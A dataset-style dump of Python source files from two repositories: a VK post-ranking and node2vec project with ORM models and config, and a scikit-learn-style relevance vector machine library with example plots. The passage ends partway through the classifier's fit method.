repo_name stringlengths 6 97 | path stringlengths 3 341 | text stringlengths 8 1.02M |
|---|---|---|
moff4/gladius | logic/rank/wr.py | <filename>logic/rank/wr.py
#!/usr/bin/env python3
import sys
import time
import numpy.linalg
import numpy.random
import random
VK_SPREAD = [
[-24, 58.0], [-23, 36.0], [-22, 20.0], [-21, 17.0],
[-20, 16.0], [-19, 19.0], [-18, 24.0], [-17, 36.0],
[-16, 45.0], [-15, 55.0], [-14, 60.0], [-13, 70.0],
[-12, 75.0], [-11, 79.0], [-10, 83.0], [-9, 87.0],
[-8, 92.0], [-7, 96.0], [-6, 100.0], [-5, 105.0],
[-4, 108.0], [-3, 105.0], [-2, 96.0], [-1, 80.0],
[0, 58.0], [1, 36.0], [2, 20.0], [3, 17.0],
[4, 16.0], [5, 19.0], [6, 24.0], [7, 36.0],
[8, 45.0], [9, 55.0], [10, 60.0], [11, 70.0],
[12, 75.0], [13, 79.0], [14, 83.0], [15, 87.0],
[16, 92.0], [17, 96.0], [18, 100.0], [19, 105.0],
[20, 108.0], [21, 105.0], [22, 96.0], [23, 80.0],
[24, 58.0], [25, 36.0], [26, 20.0], [27, 17.0],
[28, 16.0], [29, 19.0], [30, 24.0], [31, 36.0],
[32, 45.0], [33, 55.0], [34, 60.0], [35, 70.0],
[36, 75.0], [37, 79.0], [38, 83.0], [39, 87.0],
[40, 92.0], [41, 96.0], [42, 100.0], [43, 105.0],
[44, 108.0], [45, 105.0], [46, 96.0], [47, 80.0],
[48, 58.0],
]
def WR_params(date, f=1):
"""
Generates params for WeightRandom class
"""
tm = time.localtime(date)
date = (tm.tm_hour * 60 + tm.tm_min) * 60 + tm.tm_sec
return [
[date, 0.0],
[date + (3600 + 600) / f, 3200],
[date + (2 * 3600) / f, 1850]
]
class PyWeightRandom:
"""
use post date and time of publish
to generate weight random method()
it emulates when user creates reposts/likes
"""
def __init__(self, data):
"""
data = [
[ x0 , y0 ] , - левая точка нуля пораболы
[ x1 , y1 ] , - пик
[ x2 , y2 ] - точка после точки пика через ( x1-x0 )
]
endpoint = mun of second that:
1. > x0
2. <= x0 + 86000
"""
# p = [ x0 , x1 , y1 , y2]
self.p = [data[0][0], data[1][0], data[1][1], data[2][1]]
mm = [
[self.p[0]**2, self.p[0], 1],
[self.p[1]**2, self.p[1], 1],
[(2 * self.p[1] - self.p[0])**2, (2 * self.p[1] - self.p[0]), 1]
]
abc = list(numpy.linalg.solve(mm, [0, self.p[2], 0]))
self.a = abc[0]
self.b = abc[1]
self.c = abc[2]
mm = [
[1.0, -self.p[2]],
[1.0, -self.p[3]]
]
dk = numpy.linalg.solve(mm, [self.p[2] * self.p[1], self.p[3] * (2 * self.p[1] - self.p[0])])
self.d = dk[0]
self.k = dk[1]
self.data = {}
self._fill()
self._weight = list(self.data.values())
self._m = sum(self._weight)
self.elem = list(self.data.keys())
self.weight = list(map(lambda x: float(x) / float(self._m), self._weight))
# ==========================================================================
# INTERNAL METHODS
# ==========================================================================
def spread(self, x):
"""
формула распределения случайно величиный
p = [
0 - start point (flaot)
1 - X where max of Y (float)
2 - max of Y (float)
3 - Y when x = ( 2*p[1]-p[0] )
]
"""
if self.p[0] + 1 <= x <= self.p[1] + 1:
res = self.a * (x**2) + self.b * x + self.c
elif self.p[1] <= x:
res = (self.d / (x + self.k))
else:
res = self.spread(x + 3600 * 24)
return res
def _fill(self):
"""
should fill self.data with values of spread function in interesing range
return None
"""
end = 86400 + (i := self.p[0])
while i < end:
self.data[i % 86400] = self.spread(i)
i += 1
def random(self, y=1):
"""
return random number using spread function
"""
if y <= 1:
x = random.random()
i = 0
while x > 0.0:
x -= self.weight[i]
i += 1
return [i - 1]
else:
k = float(self._m) / float(y)
x = []
y = k
for i in range(len(ww := list(self._weight))):
while ww[i] > 0.0:
y -= (z := min(y, ww[i]))
ww[i] -= z
if y <= 0.0:
y = k
x.append(ww[i])
return x
def destruct(self):
"""
really do nothing (here)
"""
pass
def will_be(self, count_now, now):
"""
predict now many obj will be in 24 hours
"""
def en(_time):
tm = time.localtime(_time)
return (tm.tm_hour * 60 + tm.tm_min) * 60 + tm.tm_sec
if (now := en(now)) < self.p[0]:
now += 24 * 3600
return (
(count_now * sum(self.weight) / s)
if (
s := sum(
self.weight[i]
for i in range(len(self.weight))
if self.p[0] < i < now
)
) > 0 else
0
)
def py__interpolice(ff, x):
"""
real interpolice method
USE ONLY BY INTERPOLICE
"""
res = 0.0
for i in ff:
if not(-12 < (i[0] - x) < 12):
continue
li = 1.0
for j in ff:
if not(-12 < (j[0] - x) < 12):
continue
if i[0] != j[0]:
z = (i[0] - j[0])
li *= ((x - j[0]) / z)
res += li * i[1]
return res
boo = False
if sys.platform in {'linux', 'darwin'} and '--no-c' not in sys.argv[1:]:
try:
from .ext import interpolice as __interpolice
from .ext import CWeightRandom as WeightRandom
boo = True
except Exception:
pass
if not boo:
WeightRandom = PyWeightRandom
__interpolice = py__interpolice
def interpolice(x, ff=None):
"""
takes as x float() - number of hours
13:30 - 13.5
return float from [0..1]
ff = [
[x0 , f(x0)],
[x1 , f(x1)],
]
"""
if ff is None:
ff = VK_SPREAD
_max = 108.0
else:
_max = float(max(i[1] for i in ff))
return __interpolice(ff, x) / _max
|
moff4/gladius | tasks/node2vec.py |
from typing import Any
from node2vec.edges import HadamardEmbedder
from node2vec import Node2Vec
from conf import conf
from logic.graph import GRAPH
ARGS = {}
task_description = 'train Node2Vec; args: %s' % ', '.join(list(ARGS))
def train(model_filename: str, embeding_filename: str, edges_filename: str, **params: Any):
graph = GRAPH.graph
node2vec = Node2Vec(graph, dimensions=64, walk_length=30, num_walks=200, workers=8)
model = node2vec.fit(window=10, min_count=1, batch_words=4)
model.wv.save_word2vec_format(embeding_filename)
model.save(model_filename)
edges_embs = HadamardEmbedder(keyed_vectors=model.wv)
edges_kv = edges_embs.as_keyed_vectors()
edges_kv.save_word2vec_format(edges_filename)
def start():
try:
train(**conf.node2vec)
except KeyboardInterrupt:
...
|
moff4/gladius | db/post.py | <reponame>moff4/gladius<gh_stars>0
from pony import orm
from conf import conf
class Post(conf.sql.Entity):
_table_ = ('hashtag', 'post')
post_id = orm.PrimaryKey(str)
post_date = orm.Required(int)
views = orm.Required(int)
likes = orm.Required(int)
reposts = orm.Required(int)
timestamp = orm.Required(int)
from_group = orm.Required(bool, nullable=True)
tags = orm.Set('PostTag')
|
moff4/gladius | conf/__init__.py | <reponame>moff4/gladius
from pony import orm
from k2.utils.autocfg import AutoCFG
try:
from .private import aeon
except ImportError:
aeon = {}
try:
from .private import db
except ImportError:
db = {}
try:
from .private import rank
except ImportError:
rank = {}
try:
from .private import api
except ImportError:
api = {}
try:
from .private import graph
except ImportError:
graph = {}
conf = AutoCFG(
{
'aeon': AutoCFG(aeon).update_missing(
{
'use_ssl': False,
'port': 8080,
'https_port': 8081,
'host': '',
'ssl': None,
'ssl_handshake_timeout': None,
'site_dir': './var/',
'pws_secret': 'pws_secret',
'request': {
'request_header': 'x-user-id',
'protocol': {
'allowed_methods': {'GET', 'POST'},
}
},
},
),
'db': AutoCFG(db).update_missing(
{
'provider': 'mysql',
'host': None,
'port': None,
'user': None,
'passwd': <PASSWORD>,
'db': None,
},
),
'rank': AutoCFG(rank).update_missing(
{
'quality_precision': 1000.0,
'proc_num': 4,
},
),
'graph': AutoCFG(graph).update_missing(
{
'file': 'graph.dump',
'proc_num': 4,
},
),
'node2vec': AutoCFG(graph).update_missing(
{
'model_filename': 'model.n2v',
'embeding_filename': 'embed.n2v',
'edges_filename': 'edges.n2v',
}
),
'api': AutoCFG(api).update_missing(
{
'secret': '0123456789',
'cache_dump_enable': True,
'cache_dump_file': 'cache.dump',
},
),
}
)
conf.sql = orm.Database(**conf.db)
|
moff4/gladius | tasks/shell.py |
import IPython
from pony import orm
task_description = 'run shell'
@orm.db_session
def start():
IPython.embed()
|
Mind-the-Pineapple/sklearn-rvm | examples/rvm_for_regression.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
=========================================================
RVM for regression
=========================================================
Based on https://github.com/ctgk/PRML/blob/master/notebooks/ch07_Sparse_Kernel_Machines.ipynb
"""
print(__doc__)
import matplotlib.pyplot as plt
import numpy as np
from sklearn_rvm import EMRVR
def create_toy_data(n=20):
x = np.linspace(0, 1, n)
t = np.sin(2 * np.pi * x) + np.random.normal(scale=0.1, size=n)
return x, t
x_train, y_train = create_toy_data(n=50)
x = np.linspace(0, 1, 100)
model = EMRVR(kernel="rbf")
model.fit(x_train[:, None], y_train)
y, y_std = model.predict(x[:, None], return_std=True)
plt.scatter(x_train, y_train, facecolor="none", edgecolor="g", label="training")
plt.scatter(x[model.relevance_], y[model.relevance_], s=100, facecolor="none", edgecolor="b", label="relevance vector")
plt.plot(x[:, None], y, color="r", label="predict mean")
plt.fill_between(x, y - y_std, y + y_std, color="pink", alpha=0.2, label="predict std.")
plt.legend(loc="best")
plt.show()
|
Mind-the-Pineapple/sklearn-rvm | examples/plot_iris_rvc.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
=====================================================================
Example of a Multiple Layer Classifier using the Iris Dataset
=====================================================================
Based on https://scikit-learn.org/stable/auto_examples/svm/plot_iris_svc.html
"""
print(__doc__)
import matplotlib.pyplot as plt
import numpy as np
from sklearn import datasets
from sklearn_rvm import EMRVC
def make_meshgrid(x, y, h=.02):
"""Create a mesh of points to plot in
Parameters
----------
x: data to base x-axis meshgrid on
y: data to base y-axis meshgrid on
h: stepsize for meshgrid, optional
Returns
-------
xx, yy : ndarray
"""
x_min, x_max = x.min() - 1, x.max() + 1
y_min, y_max = y.min() - 1, y.max() + 1
xx, yy = np.meshgrid(np.arange(x_min, x_max, h),
np.arange(y_min, y_max, h))
return xx, yy
def plot_contours(ax, clf, xx, yy, **params):
"""Plot the decision boundaries for a classifier.
Parameters
----------
ax: matplotlib axes object
clf: a classifier
xx: meshgrid ndarray
yy: meshgrid ndarray
params: dictionary of params to pass to contourf, optional
"""
#Z = clf.predict_proba(np.c_[xx.ravel(), yy.ravel()])[:, 1]
Z = clf.predict(np.c_[xx.ravel(), yy.ravel()])
Z = Z.reshape(xx.shape)
out = ax.contourf(xx, yy, Z, **params)
return out
# import some data to play with
iris = datasets.load_iris()
# Take the first two features.
X = iris.data[:, :2]
y = iris.target
models = (EMRVC(kernel='linear'),
EMRVC(kernel='rbf'),
EMRVC(kernel='sigmoid'))
models = (clf.fit(X, y) for clf in models)
# title for the plots
titles = ('RVC with linear kernel',
'RVC with RBF kernel')
# Set-up 2x2 grid for plotting.
fig, sub = plt.subplots(1, 2)
plt.subplots_adjust(wspace=0.4, hspace=0.4)
X0, X1 = X[:, 0], X[:, 1]
xx, yy = make_meshgrid(X0, X1)
for clf, title, ax in zip(models, titles, sub.flatten()):
plot_contours(ax, clf, xx, yy,
cmap=plt.cm.coolwarm, alpha=0.8)
ax.scatter(X0, X1, c=y, cmap=plt.cm.coolwarm, s=20, edgecolors='k')
#ax.scatter(clf.relevance_vectors_[:, 0], clf.relevance_vectors_[:, 1], s=100, facecolor="none", edgecolor="g")
#ax.colorbar()
ax.set_xlim(xx.min(), xx.max())
ax.set_ylim(yy.min(), yy.max())
ax.set_xlabel('Sepal length')
ax.set_ylabel('Sepal width')
ax.set_xticks(())
ax.set_yticks(())
ax.set_title(title)
plt.show() |
Mind-the-Pineapple/sklearn-rvm | sklearn_rvm/em_rvm.py | <filename>sklearn_rvm/em_rvm.py
"""Relevance vector machine using expectation maximization like algorithm.
Based on
--------
https://github.com/JamesRitchie/scikit-rvm
https://github.com/ctgk/PRML/blob/master/prml/kernel/relevance_vector_regressor.py
"""
# Author: <NAME>
# <NAME>
# License: BSD 3 clause
import warnings
from abc import ABCMeta, abstractmethod
import numpy as np
import scipy.linalg
from numpy import linalg
from scipy.optimize import minimize
from scipy.special import expit
from sklearn.base import RegressorMixin, BaseEstimator, ClassifierMixin
from sklearn.metrics.pairwise import pairwise_kernels
from sklearn.multiclass import OneVsRestClassifier
from sklearn.utils.validation import check_X_y, check_is_fitted, check_array
class BaseRVM(BaseEstimator, metaclass=ABCMeta):
"""Basic class for Relevance Vector Machine."""
@abstractmethod
def __init__(self, kernel, degree, gamma, coef0, tol, threshold_alpha,
beta_fixed, alpha_max, init_alpha, bias_used,
max_iter, compute_score, epsilon, verbose):
if gamma == 0:
msg = ("The gamma value of 0.0 is invalid. Use 'auto' to set"
" gamma to a value of 1 / n_features.")
raise ValueError(msg)
self.kernel = kernel
self.degree = degree
self.gamma = gamma
self.coef0 = coef0
self.tol = tol
self.threshold_alpha = threshold_alpha
self.beta_fixed = beta_fixed
self.alpha_max = alpha_max
self.init_alpha = init_alpha
self.bias_used = bias_used
self.max_iter = max_iter
self.compute_score = compute_score
self.epsilon = epsilon
self.verbose = verbose
def _get_kernel(self, X, Y=None):
"""Calculate kernelised features."""
if callable(self.kernel):
params = self.kernel_params or {}
else:
params = {"gamma": self._gamma,
"degree": self.degree,
"coef0": self.coef0}
return pairwise_kernels(X, Y, metric=self.kernel,
filter_params=True, **params)
def _prune(self):
"""Remove basis functions based on alpha values."""
keep_alpha = self.alpha_ < self.threshold_alpha
if not np.any(keep_alpha):
keep_alpha[0] = True
if self.bias_used:
if not keep_alpha[0]:
self.bias_used = False
if self.kernel != "precomputed":
self.relevance_vectors_ = self.relevance_vectors_[
keep_alpha[1:]]
self.relevance_ = self.relevance_[keep_alpha[1:]]
else:
if self.kernel != "precomputed":
self.relevance_vectors_ = self.relevance_vectors_[keep_alpha]
self.relevance_ = self.relevance_[keep_alpha]
self.alpha_ = self.alpha_[keep_alpha]
self._alpha_old = self._alpha_old[keep_alpha]
self.gamma_ = self.gamma_[keep_alpha]
self.Phi_ = self.Phi_[:, keep_alpha]
self.Sigma_ = self.Sigma_[np.ix_(keep_alpha, keep_alpha)]
self.mu_ = self.mu_[keep_alpha]
@property
def _pairwise(self):
return self.kernel == "precomputed"
@property
def coef_(self):
if self.kernel != "linear":
raise AttributeError(
"coef_ is only available when using a linear kernel")
coef = self._get_coef()
return coef
def _get_coef(self):
"Calculate coefficients."
return np.dot(self.mu_, self.relevance_vectors_)
class EMRVR(RegressorMixin, BaseRVM):
"""Relevance Vector Regressor.
Implementation of the relevance vector regressor using the algorithm
based on expectation maximization.
Parameters
----------
kernel : string, optional (default="rbf")
Specifies the kernel type to be used in the algorithm.
It must be one of "linear", "poly", "rbf", "sigmoid" or "precomputed".
If none is given, "rbf" will be used.
degree : int, optional (default=3)
Degree of the polynomial kernel function ("poly"). Ignored by all other
kernels.
gamma : {"auto", "scale"} or float, optional (default="auto")
Kernel coefficient for "rbf", "poly" and "sigmoid".
Current default is "auto" which uses 1 / n_features,
if ``gamma="scale"`` is passed then it uses 1 / (n_features * X.var())
as value of gamma.
coef0 : float, optional (default=0.0)
Independent term in kernel function. It is only significant in "poly"
and "sigmoid".
tol : float, optional (default=1e-6)
Tolerance for stopping criterion.
threshold_alpha : float, optional (default=1e5)
Threshold for alpha selection criterion.
beta_fixed : {"not_fixed"} or float, optional (default="not_fixed")
Fixed value for beta. If "not_fixed" selected, the beta is updated at
each iteration.
alpha_max : int, optional (default=1e9)
Basis functions associated with alpha value beyond this limit will be
purged. Must be a positive and big number.
init_alpha : array-like of shape (n_sample) or None, optional (default=None)
Initial value for alpha. If None is selected, the initial value of
alpha is defined by init_alpha = 1 / M ** 2.
bias_used : boolean, optional (default=False)
Specifies if a constant (a.k.a. bias) should be added to the decision
function.
max_iter : int, optional (default=5000)
Hard limit on iterations within solver.
compute_score : boolean, optional (default=False)
Specifies if the objective function is computed at each step of the model.
verbose : boolean, optional (default=False)
Enable verbose output.
Attributes
----------
relevance_ : array-like, shape (n_relevance)
Indices of relevance vectors.
relevance_vectors_ : array-like, shape (n_relevance, n_features)
Relevance vectors (equivalent to X[relevance_]).
alpha_ : array-like, shape (n_samples)
Estimated alpha values.
gamma_ : array-like, shape (n_samples)
Estimated gamma values.
Phi_ : array-like, shape (n_samples, n_features)
Estimated phi values.
Sigma_ : array-like, shape (n_samples, n_features)
Estimated covariance matrix of the weights.
mu_ : array-like, shape (n_relevance, n_features)
Coefficients of the regression model (mean of posterior distribution)
coef_ : array, shape (n_class * (n_class-1) / 2, n_features)
Coefficients of the regression model (mean of posterior distribution).
Weights assigned to the features. This is only available in the case
of a linear kernel. `coef_` is a readonly property derived from `mu`
and `relevance_vectors_`.
See Also
--------
EMRVC
Relevant Vector Machine for Classification.
Notes
-----
**References:**
`The relevance vector machine.
<http://www.miketipping.com/sparsebayes.htm>`__
"""
def __init__(self, kernel="rbf", degree=3, gamma="auto_deprecated",
coef0=0.0, tol=1e-3, threshold_alpha=1e9,
beta_fixed="not_fixed", alpha_max=1e10, init_alpha=None,
bias_used=True, max_iter=5000, compute_score=False,
epsilon=1e-08, verbose=False):
super().__init__(
kernel=kernel, degree=degree, gamma=gamma, coef0=coef0, tol=tol,
threshold_alpha=threshold_alpha, beta_fixed=beta_fixed,
alpha_max=alpha_max, init_alpha=init_alpha, bias_used=bias_used,
max_iter=max_iter, compute_score=compute_score, epsilon=epsilon,
verbose=verbose)
def compute_marginal_likelihood(self, upper_inv, ed, n_samples, y):
"""Calculate marginal likelihood."""
dataLikely = (n_samples * np.log(self.beta_) - self.beta_ * ed) / 2
logdetH = -2 * np.sum(np.log(np.diag(upper_inv)))
marginal = dataLikely - 0.5 * (
logdetH - np.sum(np.log(self.alpha_)) + (
self.mu_ ** 2).T @ self.alpha_)
return marginal
def fit(self, X, y):
"""Fit the RVR model according to the given training data.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Training vectors.
y : array-like, shape (n_samples,)
Target values.
Returns
-------
self : object
"""
X, y = check_X_y(X, y, y_numeric=True, ensure_min_samples=2,
dtype="float64")
if self.kernel == "precomputed" and X.shape[0] != X.shape[1]:
raise ValueError("X.shape[0] should be equal to X.shape[1]")
if self.gamma in ("scale", "auto_deprecated"):
X_var = X.var()
if self.gamma == "scale":
if X_var != 0:
self._gamma = 1.0 / (X.shape[1] * X_var)
else:
self._gamma = 1.0
else:
kernel_uses_gamma = (not callable(self.kernel) and self.kernel
not in ("linear", "precomputed"))
if kernel_uses_gamma and not np.isclose(X_var, 1.0):
# NOTE: when deprecation ends we need to remove explicitly
# setting `gamma` in examples (also in tests). See
# https://github.com/scikit-learn/scikit-learn/pull/10331
# for the examples/tests that need to be reverted.
warnings.warn("The default value of gamma will change "
"from 'auto' to 'scale' in version 0.22 to "
"account better for unscaled features. Set "
"gamma explicitly to 'auto' or 'scale' to "
"avoid this warning.", FutureWarning)
self._gamma = 1.0 / X.shape[1]
elif self.gamma == "auto":
self._gamma = 1.0 / X.shape[1]
else:
self._gamma = self.gamma
self.scores_ = list()
n_samples = X.shape[0]
self.Phi_ = self._get_kernel(X)
# Scale Phi based on PRoNTO implementation
# http://www.mlnl.cs.ucl.ac.uk/pronto/
self._scale = np.sqrt(np.sum(self.Phi_) / n_samples ** 2)
self.Phi_ = self.Phi_ / self._scale
if self.bias_used:
self.Phi_ = np.hstack((np.ones((n_samples, 1)), self.Phi_))
M = self.Phi_.shape[1]
if self.init_alpha == None:
self.init_alpha = 1 / M ** 2
self.relevance_ = np.array(range(n_samples))
if self.kernel != "precomputed":
self.relevance_vectors_ = X
else:
self.relevance_vectors_ = None
# Initialize beta (1 / sigma squared)
if self.beta_fixed == "not_fixed":
sigma_squared = (max(self.epsilon, np.std(y) * 0.1) ** 2)
self.beta_ = 1 / sigma_squared
else:
self.beta_ = self.beta_fixed
self.alpha_ = self.init_alpha * np.ones(M)
self._alpha_old = self.alpha_.copy()
for i in range(self.max_iter):
A = np.diag(self.alpha_)
hessian = self.beta_ * self.Phi_.T @ self.Phi_ + A
# Calculate Sigma and mu
# Use Cholesky decomposition for efficiency
# Ref: https://arxiv.org/abs/1111.4144
chol_fail = False
try:
upper = scipy.linalg.cholesky(hessian)
except linalg.LinAlgError:
warnings.warn("Hessian not positive definite")
chol_fail = True
if chol_fail:
try:
self.Sigma_ = np.linalg.inv(hessian)
except linalg.LinAlgError:
warnings.warn("Using Pseudo-Inverse")
self.Sigma_ = np.linalg.pinv(hessian)
self.mu_ = self.beta_ * (self.Sigma_ @ self.Phi_.T @ y)
sigma_diag = np.diag(self.Sigma_)
else:
try:
upper_inv = np.linalg.inv(upper)
except linalg.LinAlgError:
warnings.warn("Using Pseudo-Inverse")
upper_inv = np.linalg.pinv(upper)
self.Sigma_ = np.dot(upper_inv, upper_inv.conj().T)
self.mu_ = (upper_inv @ (
upper_inv.conj().T @ self.Phi_.T @ y)) * self.beta_
# Equivalent sigma_diag = np.diag(self.Sigma_)
sigma_diag = np.sum(upper_inv ** 2, axis=1)
# Well-determinedness parameters (gamma)
self.gamma_ = 1 - self.alpha_ * sigma_diag
# Alpha re-estimation
# MacKay-style update for alpha given in original NIPS paper
self.alpha_ = np.maximum(self.gamma_, self.epsilon) / (
self.mu_ ** 2) + self.epsilon
if self.beta_fixed == "not_fixed":
# Prediction error
ed = np.sum((y - self.Phi_ @ self.mu_) ** 2)
self.beta_ = max((n_samples - np.sum(self.gamma_)),
self.epsilon) / ed + self.epsilon
# Compute marginal likelihood
if not chol_fail:
if self.compute_score:
ll = self.compute_marginal_likelihood(upper_inv, ed,
n_samples, y)
self.scores_.append(ll)
# Passes on variable information on each iteration
if self.verbose:
print("Iteration: {}".format(i))
print("Alpha: {}".format(self.alpha_))
print("Beta: {}".format(self.beta_))
print("Gamma: {}".format(self.gamma_))
print("mu: {}".format(self.mu_))
print("Relevance Vectors: {}".format(self.relevance_.shape[0]))
if self.compute_score:
print("Marginal Likelihood: {}".format(ll))
print()
# Prune based on large values of alpha
self._prune()
# Terminate if the largest alpha change is smaller than threshold
delta = np.amax(
np.absolute(np.log(self.alpha_ + self.epsilon) - np.log(
self._alpha_old + self.epsilon)))
if delta < self.tol and i > 1:
break
self._alpha_old = self.alpha_.copy()
def predict(self, X, return_std=False):
"""Predict using the RVR model.
In addition to the mean of the predictive distribution, its
standard deviation can also be returned.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Query points to be evaluate.
return_std : bool, optional (default=False)
If True, the standard-deviation of the predictive distribution at
the query points is returned along with the mean.
Returns
-------
y_mean : array, shape (n_samples, n_output_dims)
Mean of predictive distribution at query points
y_std : array, shape (n_samples,), optional
Standard deviation of predictive distribution at query points.
Only returned when return_std is True.
"""
check_is_fitted(self, ["relevance_", "mu_", "Sigma_"])
X = check_array(X)
n_samples = X.shape[0]
if self.kernel != "precomputed":
K = self._get_kernel(X, self.relevance_vectors_)
else:
K = X[:, self.relevance_]
K = K / self._scale
if self.bias_used:
K = np.hstack((np.ones((n_samples, 1)), K))
y_mean = K @ self.mu_
if return_std is False:
return y_mean
else:
err_var = (1 / self.beta_) + K @ self.Sigma_ @ K.T
y_std = np.sqrt(np.diag(err_var))
return y_mean, y_std
class EMRVC(BaseRVM, ClassifierMixin):
"""Relevance Vector Classifier.
Implementation of <NAME>"s Relevance Vector Machine for
classification using the scikit-learn API.
The multiclass support is handled according to a one-vs-rest scheme.
For details on the precise mathematical formulation of the provided
kernel functions and how `gamma`, `coef0` and `degree` affect each
other, see the corresponding section in the narrative documentation:
:ref:`svm_kernels`.
Parameters
----------
n_iter_posterior : int, optional (default=50)
Number of iterations to calculate posterior.
kernel : string, optional (default="rbf")
Specifies the kernel type to be used in the algorithm.
It must be one of "linear", "poly", "rbf", "sigmoid" or ‘precomputed’.
If none is given, "rbf" will be used.
degree : int, optional (default=3)
Degree of the polynomial kernel function ("poly"). Ignored by all other
kernels.
gamma : float, optional (default="auto")
Kernel coefficient for "rbf", "poly" and "sigmoid".
Current default is "auto" which uses 1 / n_features,
if ``gamma="scale"`` is passed then it uses 1 / (n_features * X.var())
as value of gamma. The current default of gamma, "auto", will change
to "scale" in version 0.22. "auto_deprecated", a deprecated version of
"auto" is used as a default indicating that no explicit value of gamma
was passed.
coef0 : float, optional (default=0.0)
Independent term in kernel function. It is only significant in "poly"
and "sigmoid".
tol : float, optional (default=1e-6)
Tolerance for stopping criterion.
threshold_alpha : float, optional (default=1e5)
Threshold for alpha selection criterion.
beta_fixed : {"not_fixed"} or float, optional (default="not_fixed")
Fixed value for beta. If "not_fixed" selected, the beta is updated at
each iteration.
alpha_max : int, optional (default=1e9)
Basis functions associated with alpha value beyond this limit will be
purged. Must be a positive and big number.
init_alpha : array-like of shape (n_sample) or None, optional (default=None)
Initial value for alpha. If None is selected, the initial value of
alpha is defined by init_alpha = 1 / M ** 2.
bias_used : boolean, optional (default=False)
Specifies if a constant (a.k.a. bias) should be added to the decision
function.
max_iter : int, optional (default=5000)
Hard limit on iterations within solver.
compute_score : boolean, optional (default=False)
Specifies if the objective function is computed at each step of the model.
verbose : boolean, optional (default=False)
Enable verbose output.
Attributes
----------
relevance_ : array-like, shape (n_relevance)
Indices of relevance vectors.
relevance_vectors_ : array-like, shape (n_relevance, n_features)
Relevance vectors (equivalent to X[relevance_]).
alpha_ : array-like, shape (n_samples)
Estimated alpha values.
gamma_ : array-like, shape (n_samples)
Estimated gamma values.
Phi_ : array-like, shape (n_samples, n_features)
Estimated phi values.
Sigma_ : array-like, shape (n_samples, n_features)
Estimated covariance matrix of the weights.
mu_ : array-like, shape (n_relevance, n_features)
Coefficients of the classifier (mean of posterior distribution)
coef_ : array, shape (n_class * (n_class-1) / 2, n_features)
Coefficients of the classfier (mean of posterior distribution).
Weights assigned to the features. This is only available in the case
of a linear kernel. `coef_` is a readonly property derived from `mu`
and `relevance_vectors_`.
See Also
--------
EMRVR
Relevant Vector Machine for Regression.
Notes
-----
**References:**
`The relevance vector machine.
<http://www.miketipping.com/sparsebayes.htm>`__
"""
def __init__(self, n_iter_posterior=50, kernel="rbf", degree=3,
gamma="auto_deprecated", coef0=0.0, tol=1e-3,
threshold_alpha=1e9, beta_fixed="not_fixed", alpha_max=1e10,
init_alpha=None, bias_used=True, max_iter=5000,
compute_score=False, epsilon=1e-08, verbose=False):
self.n_iter_posterior = n_iter_posterior
super().__init__(
kernel=kernel, degree=degree, gamma=gamma, coef0=coef0, tol=tol,
threshold_alpha=threshold_alpha, beta_fixed=beta_fixed,
alpha_max=alpha_max, init_alpha=init_alpha, bias_used=bias_used,
max_iter=max_iter, compute_score=compute_score, epsilon=epsilon,
verbose=verbose)
def _classify(self, mu, Phi_):
""" Perform Sigmoid Classification."""
return expit(np.dot(Phi_, mu))
def _log_posterior(self, mu, alpha, Phi_, t):
""" Calculate log posterior."""
y = self._classify(mu, Phi_)
log_p = -1 * (np.sum(np.log(y[t == 1]), 0) +
np.sum(np.log(1 - y[t == 0]), 0))
log_p = log_p + 0.5 * np.dot(mu.T, np.dot(np.diag(alpha), mu))
jacobian = np.dot(np.diag(alpha), mu) - np.dot(Phi_.T, (t - y))
return log_p, jacobian
def _compute_hessian(self, mu, alpha, Phi_, t):
""" Perform the Inverse of Covariance."""
y = self._classify(mu, Phi_)
B = np.diag(y * (1 - y))
return np.diag(alpha) + np.dot(Phi_.T, np.dot(B, Phi_))
def _posterior(self):
""" Calculate the posterior likelihood."""
result = minimize(
fun=self._log_posterior,
hess=self._compute_hessian,
x0=self.mu_,
args=(self.alpha_, self.Phi_, self.t),
method="Newton-CG",
jac=True,
options={
"maxiter": self.n_iter_posterior
}
)
self.mu_ = result.x
hessian = self._compute_hessian(self.mu_, self.alpha_, self.Phi_,
self.t)
# Calculate Sigma
# Use Cholesky decomposition for efficiency
# Ref: https://arxiv.org/abs/1111.4144
chol_fail = False
try:
upper = scipy.linalg.cholesky(hessian)
except linalg.LinAlgError:
warnings.warn("Hessian not positive definite")
chol_fail = True
if chol_fail:
try:
self.Sigma_ = np.linalg.inv(hessian)
except linalg.LinAlgError:
warnings.warn("Using Pseudo-Inverse")
self.Sigma_ = np.linalg.pinv(hessian)
else:
try:
upper_inv = np.linalg.inv(upper)
except linalg.LinAlgError:
warnings.warn("Using Pseudo-Inverse")
upper_inv = np.linalg.pinv(upper)
self.Sigma_ = np.dot(upper_inv, upper_inv.conj().T)
def fit(self, X, y):
"""Fit the RVC model according to the given training data.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Training vectors.
y : array-like, shape (n_samples,)
Target values.
Returns
-------
self : object
"""
X, y = check_X_y(X, y, y_numeric=True, ensure_min_samples=2,
dtype="float64")
if self.kernel == "precomputed" and X.shape[0] != X.shape[1]:
raise ValueError("X.shape[0] should be equal to X.shape[1]")
if self.gamma in ("scale", "auto_deprecated"):
X_var = X.var()
if self.gamma == "scale":
if X_var != 0:
self._gamma = 1.0 / (X.shape[1] * X_var)
else:
self._gamma = 1.0
else:
kernel_uses_gamma = (not callable(self.kernel) and self.kernel
not in ("linear", "precomputed"))
if kernel_uses_gamma and not np.isclose(X_var, 1.0):
# NOTE: when deprecation ends we need to remove explicitly
# setting `gamma` in examples (also in tests). See
# https://github.com/scikit-learn/scikit-learn/pull/10331
# for the examples/tests that need to be reverted.
warnings.warn("The default value of gamma will change "
"from 'auto' to 'scale' in version 0.22 to "
"account better for unscaled features. Set "
"gamma explicitly to 'auto' or 'scale' to "
"avoid this warning.", FutureWarning)
self._gamma = 1.0 / X.shape[1]
elif self.gamma == 'auto':
self._gamma = 1.0 / X.shape[1]
else:
self._gamma = self.gamma
self.classes_ = np.unique(y)
n_classes = len(self.classes_)
self.scores_ = list()
if n_classes < 2:
raise ValueError("Need 2 or more classes.")
elif n_classes == 2:
self.t = np.zeros(y.shape)
self.t[y == self.classes_[1]] = 1
n_samples = X.shape[0]
self.Phi_ = self._get_kernel(X)
# Scale Phi based on PRoNTO implementation
# http://www.mlnl.cs.ucl.ac.uk/pronto/
self._scale = np.sqrt(np.sum(self.Phi_) / n_samples ** 2)
